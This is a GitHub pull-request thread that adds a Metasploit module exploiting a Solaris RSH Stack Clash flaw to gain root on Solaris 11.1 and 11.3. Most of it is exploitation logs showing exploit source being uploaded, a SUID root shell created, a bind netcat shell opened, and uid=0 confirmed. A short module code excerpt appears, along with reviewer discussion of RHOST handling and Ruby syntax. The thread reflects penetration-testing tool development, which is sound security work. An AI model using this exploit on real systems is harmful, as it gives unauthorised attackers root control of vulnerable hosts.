Add Solaris RSH Stack Clash Privilege Escalation module #10668

Merged
merged 1 commit into from Oct 14, 2018

3 participants

bcoles commented Sep 18, 2018

Add Solaris RSH Stack Clash Privilege Escalation module.

    This module exploits a vulnerability in RSH on unpatched Solaris
    systems which allows users to gain root privileges.

    The stack guard page on unpatched Solaris systems is of
    insufficient size to prevent collisions between the stack
    and heap memory, aka Stack Clash.

    This module uploads and executes Qualys' Solaris_rsh.c exploit,
    which exploits a vulnerability in RSH to bypass the stack guard
    page to write to the stack and create a SUID root shell.

    This module has offsets for Solaris versions 11.1 (x86) and
    Solaris 11.3 (x86).

    Exploitation will usually complete within a few minutes using
    the default number of worker threads (10). Occasionally,
    exploitation will fail. If the target system is vulnerable,
    usually re-running the exploit will be successful.

    This module has been tested successfully on Solaris 11.1 (x86)
    and Solaris 11.3 (x86).

Unfortunately, this module must make use of unix/cmd payloads, due to #9498.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/solaris/local/rsh_stack_clash_priv_esc
  • set SESSION [SESSION]
  • run
  • You should get a new root session

Output

  msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1
  session => 1
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221
  rhost => 172.16.191.221
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run
  [!] SESSION may not be compatible with this module.
  [*] Using target: Solaris 11.3
  [*] Writing '/tmp/.2yZgv2XkEj/.KJqSwhpguh.c' (10297 bytes) ...
  [*] Symlinking /tmp/.2yZgv2XkEj/.KJqSwhpguh to /tmp/.2yZgv2XkEj/ROOT
  [*] Creating suid root shell. This may take a while...
  [*] Completed in 324.21s
  [+] suid root shell created: /tmp/.2yZgv2XkEj/ROOT
  [*] Writing '/tmp/.2yZgv2XkEj/.bWjzWVllCB' (109 bytes) ...
  [*] Executing payload...
  [*] Started bind TCP handler against 172.16.191.221:4444
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh.c
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh
  [!] Tried to delete /tmp/.2yZgv2XkEj/ROOT, unknown result
  [+] Deleted /tmp/.2yZgv2XkEj/.bWjzWVllCB
  [+] Deleted /tmp/.2yZgv2XkEj
  id
  uid=0(root) gid=0(root) groups=10(staff)
  uname -a
  SunOS solaris 5.11 11.3 i86pc i386 i86pc
  cat /etc/release
                               Oracle Solaris 11.3 X86
    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
                              Assembled 06 October 2015

h00die referenced this pull request Sep 19, 2018: Solaris LPEs #10583 (open, 4 of 8 tasks complete)

h00die self-assigned this Sep 26, 2018


h00die commented Sep 29, 2018

Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

So, um, why is rhost not required???? I think this is more of an underlying framework thing, but if you don't fill it out, it doesn't know where to connect. Is this some voodoo where if it's an exploit module (other than /local/) the rhost is assumed from the module's rhost? Could explain it, but when you try to exploit a /local/ module, it doesn't error.
This could also be a script kiddie check (that I failed, obvi).

11.3 w/ no rhost set (failure, as expected)

msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

Oracle Corporation	SunOS 5.11	11.3	September 2015
uname -a
id
SunOS solaris11.3 5.11 11.3 i86pc i386 i86pc
uid=100(solaris) gid=10(staff)
^Z
Background session 1? [y/N]  y
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[+] /usr/bin/rsh is setuid
[+] gcc is installed
[+] Solaris version 11.3 appears to be vulnerable
[*] Using target: Solaris 11.3
[*] Creating '/tmp/.iZEFSKULH' directory
[*] Writing '/tmp/.iZEFSKULH/.0mTFSt5QqH.c' (10297 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 10297 bytes in 1 chunks of 36168 bytes (octal-encoded), using printf
[*] Symlinking /tmp/.iZEFSKULH/.0mTFSt5QqH to /tmp/.iZEFSKULH/ROOT
[*] Creating suid root shell. This may take a while...
[*] Completed in 32.31s
[+] suid root shell created: /tmp/.iZEFSKULH/ROOT
[*] Writing '/tmp/.iZEFSKULH/.ba5WAL5L' (105 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 105 bytes in 1 chunks of 374 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Started bind TCP handler against :4444
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[!] Attempting to delete working directory /tmp/.iZEFSKULH
[*] Exploit completed, but no session was created.
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

netstat -an


TCP: IPv4
   Local Address        Remote Address     Swind  Send-Q  Rwind  Recv-Q    State
-------------------- -------------------- ------- ------ ------- ------ -----------
127.0.0.1.5999             *.*                  0      0  128000      0 LISTEN
127.0.0.1.4999             *.*                  0      0  128000      0 LISTEN
      *.111                *.*                  0      0  128000      0 LISTEN
      *.*                  *.*                  0      0  128000      0 IDLE
      *.111                *.*                  0      0  128000      0 LISTEN
      *.*                  *.*                  0      0  128000      0 IDLE
      *.22                 *.*                  0      0  128000      0 LISTEN
      *.22                 *.*                  0      0  128000      0 LISTEN
127.0.0.1.25               *.*                  0      0  128000      0 LISTEN
127.0.0.1.587              *.*                  0      0  128000      0 LISTEN
127.0.0.1.631              *.*                  0      0  128000      0 LISTEN
      *.121                *.*                  0      0  128000      0 LISTEN
      *.121                *.*                  0      0  128000      0 LISTEN
      *.53539              *.*                  0      0  128000      0 LISTEN
127.0.0.1.50015            *.*                  0      0  128000      0 LISTEN
127.0.0.1.33603            *.*                  0      0  128000      0 LISTEN
127.0.0.1.54740            *.*                  0      0  128000      0 LISTEN
127.0.0.1.36468            *.*                  0      0  128000      0 LISTEN
127.0.0.1.53682            *.*                  0      0  128000      0 LISTEN
127.0.0.1.52462            *.*                  0      0  128000      0 LISTEN
127.0.0.1.43476            *.*                  0      0  128000      0 LISTEN
127.0.0.1.54135            *.*                  0      0  128000      0 LISTEN
2.2.2.2.22      1.1.1.1.40755    60416      0  128872     52 ESTABLISHED
      *.4444               *.*                  0      0  128000      0 LISTEN

bcoles commented Sep 29, 2018

@h00die that has been an issue for a loooong time. RHOST is required.


h00die commented Sep 29, 2018

11.3 success (after setting rhost)

msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[+] /usr/bin/rsh is setuid
[+] gcc is installed
[+] Solaris version 11.3 appears to be vulnerable
[*] Using target: Solaris 11.3
[*] Creating '/tmp/.rHzBLwmROl' directory
[*] Writing '/tmp/.rHzBLwmROl/.HLvXWZnXBvz.c' (10297 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 10297 bytes in 1 chunks of 36168 bytes (octal-encoded), using printf
[*] Symlinking /tmp/.rHzBLwmROl/.HLvXWZnXBvz to /tmp/.rHzBLwmROl/ROOT
[*] Creating suid root shell. This may take a while...
[*] Completed in 136.99s
[+] suid root shell created: /tmp/.rHzBLwmROl/ROOT
[*] Writing '/tmp/.rHzBLwmROl/.77znv2mEhI' (109 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 109 bytes in 1 chunks of 390 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Started bind TCP handler against 2.2.2.2:8989
[*] Command shell session 2 opened (1.1.1.1:40009 -> 2.2.2.2:8989) at 2018-09-29 15:26:30 -0400
[+] Deleted /tmp/.rHzBLwmROl/.HLvXWZnXBvz.c
[+] Deleted /tmp/.rHzBLwmROl/.HLvXWZnXBvz
[!] Tried to delete /tmp/.rHzBLwmROl/ROOT, unknown result
[+] Deleted /tmp/.rHzBLwmROl/.77znv2mEhI
[!] Attempting to delete working directory /tmp/.rHzBLwmROl
[-] Unable to delete /tmp/.rHzBLwmROl
[!] Attempting to delete working directory /tmp/.rHzBLwmROl

id
uid=0(root) gid=0(root) groups=10(staff)

h00die commented Sep 29, 2018

For continuity, I'm using an ssh_login initial shell. I've been getting those printf warnings on my modules I'm working on as well on the 11.3 box; however, the code I've checked passes a diff, so it seems to be inconsequential.


bcoles commented Sep 29, 2018

@h00die yeah I've seen the printf errors on a bunch of modules - not just local modules - but never seemed to cause any problems.
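The "/usr/bin/printf ... Failed:" lines in the output above come from a probe that writes a short byte sequence through printf and compares what comes back with what was sent. The Ruby below is an added example, not code from this module or from Metasploit, that models that probe: it encodes bytes as printf octal escapes exactly as the log shows, decodes them the way printf(1) does, and then shows why a strict comparison fails when stderr warnings are merged into the output even though the bytes themselves arrive intact. The Solaris output is constructed from the twelve warning lines seen in the log, the warning-line pattern is an assumption, and local_printf_probe assumes a printf binary is on PATH.

```ruby
require 'open3'

# Constructed probe, copied from the log lines above: a NUL, two high bytes,
# printable ASCII, DEL, two percent signs and CRLF.
PROBE_BYTES = "\x00\xFF\xFEABCD\x7F%%\r\n".b

# Encode every byte as a printf(1) octal escape (\0, \377, \101 ...). Escaping
# every byte, not only the unprintable ones, means the decoder never has to
# guess where an escape ends: the next character is always a backslash.
def octal_encode(bytes)
  bytes.b.each_byte.map { |b| "\\#{b.to_s(8)}" }.join
end

# Model of how printf(1) turns the escaped format back into raw bytes. Octal
# escapes are emitted directly, so the two "%" bytes come out literally and are
# never re-read as a conversion specifier (which is why the expected output in
# the log keeps both percent signs).
def printf_decode(fmt)
  fmt.b.gsub(/\\([0-7]{1,3})/) { [Regexp.last_match(1).to_i(8)].pack('C') }
end

# Assumed shape of the Solaris warning lines seen in the log.
WARNING_LINE = /^printf: [^\n]*\n/

# A probe is strictly ok when the observed output equals the expected bytes.
# A command shell hands back stdout and stderr merged, so a printf that warns
# on stderr but still writes the bytes fails the strict test even though the
# transfer works. payload_intact answers the question that matters: once the
# warning lines are removed, are the expected bytes all still there?
def probe_result(observed, expected = PROBE_BYTES)
  observed = observed.b
  warnings = observed.scan(WARNING_LINE).size
  cleaned  = observed.gsub(WARNING_LINE, '')
  {
    strict_ok: observed == expected,
    payload_intact: cleaned == expected,
    warnings: warnings
  }
end

# Running printf with stdout and stderr kept apart removes the ambiguity
# entirely; array-form arguments avoid a shell re-parsing the escapes.
def local_printf_probe(expected = PROBE_BYTES)
  out, err, = Open3.capture3('printf', octal_encode(expected))
  probe_result(out, expected).merge(stderr: err)
end

# Constructed stand-in for the Solaris 11.3 output in the log: twelve warning
# lines, then the probe bytes, captured as one merged stream.
SAMPLE_MERGED_OUTPUT = ("printf: Illegal byte sequence\n" * 12 + PROBE_BYTES).b

if __FILE__ == $PROGRAM_NAME
  p octal_encode(PROBE_BYTES)          # the format string seen in the log
  p probe_result(SAMPLE_MERGED_OUTPUT) # strict_ok false, payload_intact true
  p probe_result(PROBE_BYTES)          # clean run: everything true
end
```

On the clean run the strict comparison passes; on the constructed Solaris output it fails only because of the warning text, which matches what the thread observed: the uploaded files still diff clean. Keeping stderr separate, as local_printf_probe does, is the cleaner check where the session allows it.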

print_status "Creating suid root shell. This may take a while..."
cmd_exec "cd #{base_path}"
start = Time.now
output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800

h00die commented Oct 13, 2018
1_800?

irb(main):001:0> 1_800
=> 1800

I'm not a Ruby person, but wanted to check on this timeout value: is it supposed to be 1800, or do you have something new to teach me on Ruby? Wouldn't be the ... 10th time you taught me a new trick!

bcoles commented Oct 14, 2018
1_800 is correct. It's 1800 seconds timeout.

On a modest VM (IIRC: 1GB RAM, 1 CPU core) under no load, an exploitation attempt should either succeed or fail within half an hour (1800 seconds) - usually much quicker.

Ruby natively supports using _ within numbers, which is useful for formatting large numbers for readability. It's typically used as a thousands-separator, but can also be used stupidly:

2.3.0 :001 > 1_2.3_4
 => 12.34 
2.3.0 :002 > 

h00die commented Oct 14, 2018
Looks like there's a PEP for Python, it just hasn't gotten there yet.

Thanks for the details, that is a neat/nice way to show bigger numbers and not have to count zeroes

h00die merged commit 4fb223b into rapid7:master Oct 14, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

h00die added a commit that referenced this pull request Oct 14, 2018


h00die commented Oct 14, 2018

Release Notes

The exploit/solaris/local/rsh_stack_clash_priv_esc module has been added to the framework. It allows you to gain root privileges by exploiting a vulnerability in RSH on Solaris 11.1 and 11.3.

msjenkins-r7 added a commit that referenced this pull request Oct 14, 2018
